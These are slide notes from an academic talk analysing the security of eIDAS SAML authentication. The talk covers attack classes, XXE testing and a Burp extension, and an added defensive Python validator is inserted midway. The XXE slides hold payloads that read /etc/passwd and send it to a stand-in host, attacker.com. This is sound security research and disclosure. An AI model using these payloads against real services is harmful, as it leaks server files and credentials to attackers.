Page 1
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe
Nils Engelbertz, Nurullah Erinola, David Herring, Juraj Somorovsky, Vladislav Mladenov, Jörg Schwenk
Ruhr University Bochum
Page 2
Electronic Identification (eID) Services
• Strong authentication with eID cards
• Usage in public and private sector
• Tax, health, education, …
• Since the early 2000s
• Problem: interoperability
Security Analysis of eIDAS – The Cross-Country Authentication Scheme in Europe. WOOT'18 2
Page 3
eIDAS
• electronic IDentification, Authentication, and Trust Services
• Interoperability framework
• Supports cross-country authentication
• Main standard: SAML
Page 4
Our Work
• Security of eIDAS authentication services
• Systematization of knowledge regarding relevant attacks
• Comprehensive penetration test
• Responsible disclosure
• Prototype tool support
• Part of the project
Page 5
Overview
1. SAML
2. eIDAS
3. Attacks
  • XML Parsing Attacks
  • Evaluation
4. EsPreSSO
5. Conclusions
Page 6
SAML-based Single Sign-On
Diagram parties: Service Provider, Identity Provider
1. Start Authentication
2. Start Authentication: SAMLRequest
3. Authentication
4. Authentication Token: SAMLResponse
5. Resources
Page 7
SAML Authentication Token
<saml:Response>
  <saml:Assertion ID="456">
    <saml:Issuer>GermanIdP.com</saml:Issuer>
    <saml:Subject>
      <saml:NameID>[email protected]</saml:NameID>
    </saml:Subject>
    <saml:Conditions
        NotBefore="2018-03-21T14:42:00Z"
        NotOnOrAfter="2018-03-21T14:47:00Z">
      <saml:AudienceRestriction>
        <saml:Audience>GermanSP.com</saml:Audience>
      </saml:AudienceRestriction>
    </saml:Conditions>
    <ds:Signature Reference="456">
    </ds:Signature>
  </saml:Assertion>
</saml:Response>
Diagram labels: Response, Assertion, Issuer (GermanIdP), Subject / NameID (Bob), Conditions / Audience (GermanSP), Signature
Page 9
Overview of eID Services
Country SAML OpenID OpenID Connect Other
Austria Yes OAuth
Belgium Yes
Bulgaria Yes Yes
Czech Republic
Denmark Yes (eIDAS) NemID
Estonia
Finland Yes (eIDAS) Yes
France Yes
Georgia No (eIDAS planned) No (obsolete) No
Germany Yes No* SOAP
Netherlands Yes
Norway Yes
Portugal Yes
Sweden Yes
United Kingdom Yes No No SAML (Attribute Query)
eIDAS Yes
https://github.com/RUB-NDS/FutureTrust/wiki
Page 10
eIDAS Authentication
• Each country has its own eID authentication mechanisms
• Huge differences between these lead to incompatibility
  • Different architecture
  • Different protocols
  • Different parameters
• eIDAS provides a bridge making cross-country eID authentication possible
Page 11
eIDAS Authentication
Diagram parties: Service Provider, Identity Provider
Page 12
eIDAS Authentication
Diagram parties: Service Provider, eIDAS Node, eIDAS Node, Identity Provider
Page 13
Diagram parties: Service Provider, eIDAS Node, eIDAS Node, Identity Provider
1. Start Authentication
2. Start Authentication: SAMLRequest1
3. Start Authentication: SAMLRequest2
4. Start Authentication: SAMLRequest3
5. Authentication
6. Authentication Token: SAMLResponse1
7. Authentication Token: SAMLResponse2
8. Authentication Token: SAMLResponse3
9. Resources
Page 15
eIDAS Authentication
Diagram parties: Service Provider, eIDAS Node, eIDAS Node, Identity Provider
Page 16
eIDAS Authentication
Diagram parties: Service Provider, eIDAS Node, eIDAS Node, Identity Provider
Page 17
SAML Evaluation [Mainka et al., 2014]
Page 18
Attacks Summary
• Signature Exclusion
• Certificate Faking
• XML External Entity
• XSLT Attack
• Replay Attacks
• Recipient Confusion
• Signature Wrapping
• Certificate Injection
• ACS Spoofing
• Open Redirect
• Covert Redirect
• Cross-Site Scripting
• CSRF Attacks
• Insecure HTTP Session
• Insecure TLS Session
Page 20
Evaluation of XML Parsing Attacks
• No valid ID cards needed
• Serious attacks; Facebook paid a $33,500 reward
Page 21
XML Entities
XML Code (example):
<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY res "HI"> ]>
<data>&res;</data>
The parser first "registers" the entities declared within the DOCTYPE.
Page 22
XML Entities
XML Code (example):
<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY res "HI"> ]>
<data>&res;</data>
The parser then detects the reference to the ENTITY ...
Page 23
XML Entities
XML Code (example):
<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY res "HI"> ]>
<data>HI</data>
... and resolves it.
Page 24
XML Entities
Are XML Entities dangerous?
Page 25
XML Entities
Illegitimate File Access with XXE
Page 26
Illegitimate File Access
XML Code (example):
<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY file SYSTEM "/etc/passwd"> ]>
<data>&file;</data>
Page 27
Illegitimate File Access
XML Code (example):
<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY file SYSTEM "/etc/passwd">
  <!ENTITY send SYSTEM "http://attacker.com/?f=&file;">
]>
<data>&send;</data>
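As an added defender-side example (not code from the talk or the FutureTrust project), the check below applies the SAML token slide and the XXE slides to a constructed Response: it refuses any DOCTYPE before parsing, then requires exactly one Assertion whose Signature Reference matches its ID, the expected Issuer and Audience, and a clock inside NotBefore/NotOnOrAfter. It keeps the slide's simplified `Reference` attribute on ds:Signature (real XMLDSig uses ds:Reference URI inside SignedInfo) and performs no cryptographic verification, which a real Service Provider must do against the IdP certificate before trusting any of these values.

```python
import re
import xml.etree.ElementTree as ET
from datetime import datetime, timezone

NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion", "ds": "http://www.w3.org/2000/09/xmldsig#"}

def parse_without_doctype(xml_bytes):
    # SAML never needs a DTD: refuse any DOCTYPE before the parser runs, which
    # removes every ENTITY variant from the slides (internal, SYSTEM file, OOB URL).
    if re.search(rb"<!DOCTYPE", xml_bytes):
        raise ValueError("DOCTYPE not allowed")
    return ET.fromstring(xml_bytes)

def _ts(value):  # SAML timestamps end in "Z"; fromisoformat wants an explicit offset
    return datetime.fromisoformat(value.replace("Z", "+00:00"))

def validate_assertion(xml_bytes, issuer, audience, now):
    """Structural checks on the slide-7 token; returns NameID or raises ValueError.
    Real code must also verify ds:Signature cryptographically with the IdP's
    certificate (not modelled here) before any of these values are trusted."""
    root = parse_without_doctype(xml_bytes)
    assertions = root.findall("saml:Assertion", NS)
    if len(assertions) != 1:
        raise ValueError("expected exactly one Assertion")
    a = assertions[0]
    sig = a.find("ds:Signature", NS)  # signature exclusion / wrong-element check
    if sig is None or sig.get("Reference") != a.get("ID"):
        raise ValueError("unsigned, or signature does not cover this Assertion")
    if a.findtext("saml:Issuer", namespaces=NS) != issuer:
        raise ValueError("unexpected Issuer")
    cond = a.find("saml:Conditions", NS)
    aud = None if cond is None else cond.find("saml:AudienceRestriction/saml:Audience", NS)
    if aud is None or aud.text != audience:  # recipient confusion check
        raise ValueError("token was issued for another Service Provider")
    if not _ts(cond.get("NotBefore")) <= now < _ts(cond.get("NotOnOrAfter")):  # replay window
        raise ValueError("token outside its validity window")
    return a.findtext("saml:Subject/saml:NameID", namespaces=NS)

def outcome(xml_bytes, issuer="GermanIdP.com", audience="GermanSP.com",
            now=datetime(2018, 3, 21, 14, 44, tzinfo=timezone.utc)):
    try:
        return validate_assertion(xml_bytes, issuer, audience, now)
    except (ValueError, ET.ParseError) as exc:
        return "REJECTED: " + str(exc)

# Constructed sample modelled on slide 7 (namespace declarations added so it parses).
GOOD = (b'<saml:Response xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"'
        b' xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><saml:Assertion ID="456">'
        b'<saml:Issuer>GermanIdP.com</saml:Issuer><saml:Subject><saml:NameID>Bob</saml:NameID>'
        b'</saml:Subject><saml:Conditions NotBefore="2018-03-21T14:42:00Z"'
        b' NotOnOrAfter="2018-03-21T14:47:00Z"><saml:AudienceRestriction><saml:Audience>'
        b'GermanSP.com</saml:Audience></saml:AudienceRestriction></saml:Conditions>'
        b'<ds:Signature Reference="456"></ds:Signature></saml:Assertion></saml:Response>')
# The slide's SYSTEM-entity payload in place of the NameID; an unsigned copy; a late clock.
XXE = b'<?xml version="1.0"?><!DOCTYPE d [<!ENTITY file SYSTEM "/etc/passwd">]>' + GOOD.replace(b"Bob", b"&file;")
UNSIGNED = GOOD.replace(b'<ds:Signature Reference="456"></ds:Signature>', b"")
LATE = datetime(2018, 3, 21, 14, 50, tzinfo=timezone.utc)
```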
Page 29
Evaluation
Page 30
Comprehensive Evaluation of the eIDAS Swedish Pilot
• Offers demo services
• Made it possible to analyze further attacks such as XML Signature Wrapping, XSS, etc.
• No further vulnerabilities found
Page 32
Automatic Evaluation with EsPreSSO
• Burp Suite extension
• Extension for Processing and Recognition of Single Sign-On Protocols
• We implemented XXE and Signature Wrapping attacks for SAML
• XML Encryption attacks planned
Page 35
Conclusion
• XXE is still a problem
• Many critical vulnerabilities are already fixed
• Our contributions
  • Best Current Practices for eIDAS
  • Automated tool for the security analysis of SAML
• More information
  • https://github.com/RUB-NDS/FutureTrust/wiki
  • https://github.com/RUB-NDS/BurpSSOExtension
  • https://www.futuretrust.eu/